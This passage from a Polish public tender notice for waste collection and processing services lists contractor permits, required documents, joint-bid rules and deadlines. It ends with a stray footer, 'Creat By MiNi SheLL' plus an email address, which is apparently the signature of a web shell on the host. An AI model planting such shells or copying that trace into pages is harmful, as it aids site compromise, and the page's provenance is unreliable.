zawodowej, o ile wynika to z odrębnych przepisów.<br/>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada:<br/>1. w zakresie zadania nr 1: <br/>a)	wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach <br/>i gospodarujących odpadami, prowadzonego przez marszałka województwa, właściwego ze względu na miejsce wykonywania działalności przez Wykonawcę – zgodnie z ustawą z dnia 14 grudnia 2012r. o odpadach (t.j.: Dz. U. z 2023r. poz. 1587 ze zm.) (BDO – Dział: VII, XII).<br/>Zamawiający dokona oceny spełniania tego warunku na podstawie oświadczenia, <br/>o którym mowa w dziale VIII pkt 1 SWZ.<br/>2.	w zakresie zadania nr 2: <br/>a)	wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach <br/>i gospodarujących odpadami, prowadzonego przez marszałka województwa, właściwego ze względu na miejsce wykonywania działalności przez Wykonawcę – zgodnie z ustawą z dnia 14 grudnia 2012r. o odpadach (t.j.: Dz. U. z 2023r. poz. 1587 ze zm.) (BDO – Dział: VII).<br/>Zamawiający dokona oceny spełniania tego warunku na podstawie oświadczenia, <br/>o którym mowa w dziale VIII pkt 1 SWZ.<br/>b)	aktualną decyzję (transport, zbieranie lub przetwarzanie odpadów) uprawniającą do wykonywania usługi, w zakresie gospodarowania odpadami określonymi w zał. nr 4 do SWZ – „Opis przedmiotu zamówienia” i zał. nr 5 B do SWZ – „Szczegółowa oferta cenowa – zadanie nr 2”.<br/>W celu dokonania oceny spełnienia tego warunku Zamawiający wezwie Wykonawcę, którego oferta zostanie oceniona, jako najkorzystniejsza, do przedstawienia dokumentów wskazanych w pkt. IX ppkt 1.3. SWZ;<br/>3.	w zakresie zadania nr 3: <br/>a)	wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach <br/>i gospodarujących odpadami, prowadzonego przez marszałka województwa, właściwego ze względu na miejsce wykonywania działalności przez Wykonawcę – zgodnie z ustawą z dnia 14 grudnia 2012r. o odpadach (t.j.: Dz. U. z 2023r. poz. 1587 ze zm.) (BDO – Dział: VII).<br/>Zamawiający dokona oceny spełniania tego warunku na podstawie oświadczenia, <br/>o którym mowa w dziale VIII pkt 1 SWZ.<br/>b)	aktualną decyzję (transport oraz przetwarzanie odpadów) uprawniającą do wykonywania usługi, w zakresie gospodarowania odpadami określonymi w zał. nr 4 do SWZ – „Opis przedmiotu zamówienia” i zał. nr 5 C do SWZ – „Szczegółowa oferta cenowa – zadanie nr 3”.<br/>W celu dokonania oceny spełnienia tego warunku Zamawiający wezwie Wykonawcę, którego oferta zostanie oceniona, jako najkorzystniejsza, do przedstawienia dokumentów wskazanych w pkt. IX ppkt 1.4. SWZ;<br/>4.	w zakresie zadania nr 4: <br/>a)	wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach <br/>i gospodarujących odpadami, prowadzonego przez marszałka województwa, właściwego ze względu na miejsce wykonywania działalności przez Wykonawcę – zgodnie z ustawą z dnia 14 grudnia 2012r. o odpadach (t.j.: Dz. U. z 2023r. poz. 1587 ze zm.) (BDO – Dział: VII).<br/>Zamawiający dokona oceny spełniania tego warunku na podstawie oświadczenia, <br/>o którym mowa w dziale VIII pkt 1 SWZ.<br/>b)	aktualną decyzję (transport oraz przetwarzanie odpadów) uprawniającą do wykonywania usługi, w zakresie gospodarowania odpadami określonymi w zał. nr 4 do SWZ – „Opis przedmiotu zamówienia” i zał. nr 5 D do SWZ – „Szczegółowa oferta cenowa – zadanie nr 4”.<br/>W celu dokonania oceny spełnienia tego warunku Zamawiający wezwie Wykonawcę, którego oferta zostanie oceniona, jako najkorzystniejsza, do przedstawienia dokumentów wskazanych w pkt. IX ppkt 1.4. SWZ;<br/>c)	aktualną decyzję inspekcji weterynaryjnej na zbieranie i transportowanie produktów pochodzenia zwierzęcego oraz zatwierdzającą środek transportu do zbierania lub przewozu ubocznych produktów pochodzenia zwierzęcego kat. III w zakresie odpadów określonych w zał. nr 4 do SWZ – „Opis przedmiotu zamówienia” i zał. nr 5 D do SWZ – „Szczegółowa oferta cenowa – zadanie nr 4”.<br/>W celu dokonania oceny spełnienia tego warunku Zamawiający wezwie Wykonawcę, którego oferta zostanie oceniona, jako najkorzystniejsza, do przedstawienia dokumentów wskazanych w pkt. IX ppkt 1.5. SWZ; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru w zakresie wynikającym z art. 109 ust. 1 pkt 4) Ustawy sporządzona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert – chyba, że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, a Wykonawca wskazał w zał. nr 1 do SWZ - „Druk Oferta”, dane umożliwiające dostęp do tych środków.<br/>2. Oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 Ustawy, o braku przynależności <br/>do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j.: Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - sporządzone zgodnie z zał. nr 6 do SWZ – „Oświadczenie o grupie kapitałowej”.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. aktualne decyzje na transport, zbieranie lub przetwarzanie odpadów uprawniające do wykonywania usług w zakresie gospodarowania odpadami określonymi w zał. nr 4 do SWZ – „Opis przedmiotu zamówienia” i zał. nr 5 B do SWZ – „Szczegółowa oferta cenowa zadanie nr 2” – w zakresie zadania nr 2.<br/>2. aktualne decyzje na transport oraz przetwarzanie odpadów uprawniające do wykonywania usług w zakresie gospodarowania odpadami określonymi w zał. nr 4 do SWZ – „Opis przedmiotu zamówienia” i zał. nr 5 C - D do SWZ – „Szczegółowa oferta cenowa zadanie nr 3 i 4” – w zakresie zadania nr 3 i 4<br/>3. aktualną decyzję inspekcji weterynaryjnej na transport oraz przetwarzanie produktów pochodzenia zwierzęcego oraz zatwierdzającą środek transportu do zbierania lub przewozu ubocznych produktów pochodzenia zwierzęcego kat. III – w zakresie zadania nr 4,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zgodnie z art. 58 ust. 1 Ustawy, Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Pełnomocnictwo Wykonawców ubiegających się wspólnie o udzielenie zamówienia, o którym mowa wyżej, winno być załączone do oferty. <br/>3.	Zgodnie z art. 59 Ustawy, w przypadku wyboru oferty Wykonawców ubiegających się wspólnie <br/>o udzielenie zamówienia, Zamawiający przed zawarciem umowy zastrzega możliwość wezwania Wykonawców do przedstawienia kopii umowy regulującej współpracę tych Wykonawców wraz <br/>z ewentualnymi kopiami aneksów do tej umowy. <br/>4.	W wypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, <br/>o którym mowa w art. 125 Ustawy, składane jest zgodnie z działem VIII pkt. 1 SWZ. Oświadczenie to wstępnie potwierdza brak podstaw do wykluczenia Wykonawców oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>5.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy kapitałowej zał. nr 6 do SWZ - „Oświadczenie o grupie kapitałowej”, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>6.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji, których te zdolności są wymagane. <br/>7.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>8.	W wypadku, o którym mowa w punkcie 6 i 7, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z art. 117 ust. 4 Ustawy dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy, sporządzone np.: na podstawie wzoru będącego zał. nr 7 do SWZ lub zawierające, co najmniej informacje, o których mowa w art. 117 ust. 4 Ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały zawarte w załączniku nr 3 do SWZ - Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/8bltr</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-20 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Szczegółowe informacje w zakresie sporządzania ofert oraz pozostałe informacje zostały zawarte w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com